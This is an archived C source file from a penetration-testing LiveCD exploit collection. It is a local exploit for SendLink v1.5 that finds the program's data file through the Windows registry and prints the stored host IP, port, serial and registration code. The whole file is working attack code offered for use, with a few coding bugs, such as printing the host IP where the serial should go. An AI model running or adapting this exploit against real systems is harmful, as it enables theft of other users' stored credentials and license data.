home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / p2p / sendlink / SendLink.c

< prev

Wrap

C/C++ Source or Header  |  2005-03-05  |  5KB  |  178 lines

---

1. /*****************************************************************
2.  
3. SendLink v1.5 Local Exploit by Kozan
4.  
5. Application: SendLink v1.5
6. Vendor:Computer Knacks
7. http://www.computerknacks.com/
8.  
9. Vulnerable Description: SendLink v1.5 discloses passwords to local users.
10.  
11. Discovered & Coded by: Kozan
12. Credits to ATmaCA
13. Web : www.netmagister.com
14. Web2: www.spyinstructors.com
15. Mail: kozan[at]netmagister[dot]com
16.  
17. *****************************************************************/
18.  
19. #include <windows.h>
20. #include <stdio.h>
21. #include <string.h>
22.  
23. #define BUFSIZE 100
24. HKEY hKey;
25. char prgfiles[BUFSIZE];
26. DWORD dwBufLen=BUFSIZE;
27. LONG lRet;
28.  
29. char *hostip, *hostname, *serial, *options, *regcode, *hostport;
30.  
31. int adresal(char *FilePath,char *Str)
32. {
33.       char kr;
34.       int Sayac=0;
35.       int Offset=-1;
36.       FILE *di;
37.       di=fopen(FilePath,"rb");
38.  
39.       if( di == NULL )
40.       {
41.               fclose(di);
42.               return -1;
43.       }
44.  
45.       while(!feof(di))
46.       {
47.               Sayac++;
48.               for(int i=0;i<strlen(Str);i++)
49.               {
50.                       kr=getc(di);
51.                       if(kr != Str[i])
52.                       {
53.                               if( i>0 )
54.                               {
55.                                       fseek(di,Sayac+1,SEEK_SET);
56.                               }
57.                               break;
58.                       }
59.                       if( i > ( strlen(Str)-2 ) )
60.                       {
61.                               Offset = ftell(di)-strlen(Str);
62.                               fclose(di);
63.                               return Offset;
64.                       }
65.               }
66.       }
67.       fclose(di);
68.       return -1;
69. }
70.  
71. char *oku(char *FilePath,char *Str)
72. {
73.  
74.       FILE *di;
75.       char cr;
76.           char BB = 0xBB;
77.       int i=0;
78.       char Feature[500];
79.  
80.       int Offset = adresal(FilePath,Str);
81.  
82.       if( Offset == -1 )
83.               return "";
84.  
85.       if( (di=fopen(FilePath,"rb")) == NULL )
86.               return "";
87.  
88.       fseek(di,Offset+strlen(Str),SEEK_SET);
89.  
90.       while(!feof(di))
91.       {
92.               cr=getc(di);
93.               if(cr == BB)
94.                           break;
95.  
96.               Feature[i] = cr;
97.               i++;
98.       }
99.  
100.       Feature[i] = '\0';
101.       fclose(di);
102.       return Feature;
103. }
104.  
105. int main(void)
106. {
107.        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
108.                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
109.                   0,
110.                   KEY_QUERY_VALUE,
111.                   &hKey) == ERROR_SUCCESS)
112.        {
113.  
114.                lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
115.                                                                (LPBYTE)
116. prgfiles, &dwBufLen);
117.  
118.                if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
119.                {
120.                        RegCloseKey(hKey);
121.            printf("An error occured!\n");
122.                        return 0;
123.                }
124.  
125.       RegCloseKey(hKey);
126.  
127.        }
128.        else
129.    {
130.                RegCloseKey(hKey);
131.        printf("An error occured!\n");
132.                return 0;
133.        }
134.  
135.        strcat(prgfiles,"\\SendLink\\User\\data.eat");
136.  
137.        printf("SendLink v1.5 Local Exploit by Kozan\n");
138.        printf("Credits to ATmaCA\n");
139.        printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
140.  
141.        try
142.        {
143.                char hostip_temp[BUFSIZE];
144.                wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
145.                hostip=oku(prgfiles,hostip_temp);
146.                printf("Host IP: %s\n",hostip);
147.  
148.                char hostname_temp[BUFSIZE];
149.                wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
150.                hostname=oku(prgfiles,hostname_temp);
151.                printf("Hostname                        : %s\n",hostname);
152.  
153.                char hostport_temp[BUFSIZE];
154.                wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
155.                hostport=oku(prgfiles,hostport_temp);
156.                printf("Host Port                        : %s\n",hostport);
157.  
158.                char options_temp[BUFSIZE];
159.                wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
160.                options=oku(prgfiles,options_temp);
161.                printf("Options                                : %s\n",options);
162.  
163.                char serial_temp[BUFSIZE];
164.                wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
165.                serial=oku(prgfiles,serial_temp);
166.                printf("Serial                                : %s\n",hostip);
167.  
168.                char regcode_temp[BUFSIZE];
169.                wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
170.                regcode=oku(prgfiles,regcode_temp);
171.                printf("Registration Code        : %s\n",regcode);
172.  
173.        }catch(...){ printf("An error occured!\n"); return 0; }
174.  
175.        return 0;
176.  
177. }
178.